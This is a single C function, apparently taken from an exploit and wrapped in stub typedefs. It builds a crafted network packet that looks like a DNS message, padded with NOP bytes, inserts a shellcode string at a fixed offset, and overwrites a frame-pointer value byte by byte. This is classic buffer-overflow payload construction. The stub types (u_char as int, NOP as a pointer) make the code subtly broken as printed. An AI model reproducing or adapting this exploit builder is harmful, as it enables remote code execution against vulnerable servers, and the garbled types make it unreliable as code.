
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_char ;
struct target_t {int len; int zshell_pos; size_t fp_pos; int fp; int zshell; } ;


 void* NOP ;
 int memcpy (int*,int ,int ) ;
 int memset (int*,void*,int) ;
 int strlen (int ) ;

__attribute__((used)) static void
zbuffami (u_char * zbuf, struct target_t *trgt)
{
  int i;
  u_char *ptr;

  ptr = zbuf;
  memset (ptr, NOP, trgt->len);

  *ptr++ = 0x69;
  *ptr++ = 0x69;
  *ptr++ = 0x81;
  *ptr++ = 0x80;
  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x01;
  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x00;

  *ptr++ = 0xc0;
  *ptr++ = 0x18;
  *ptr++ = 0x00;
  *ptr++ = 0x0c;
  *ptr++ = 0x07;
  *ptr++ = 0xeb;

  *ptr++ = 0xff;
  *ptr++ = 0xff;
  *ptr++ = 0xff;
  *ptr++ = 0xff;

  *ptr++ = 0x01;
  *ptr++ = 0xe8;


  for (i = 0; i < 2; i++, ptr += 0x7f) {
    *ptr++ = 0x7f;
    memset (ptr, NOP, 0x7f);
  }

  *ptr++ = 0x02;
  *ptr++ = NOP;
  *ptr++ = NOP;
  *ptr++ = 0x00;


  ptr = zbuf + trgt->len - 1;
  *ptr-- = 0x2e;
  *ptr = 0x2e;

  memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));

  zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff);
  zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
  zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
  zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
}
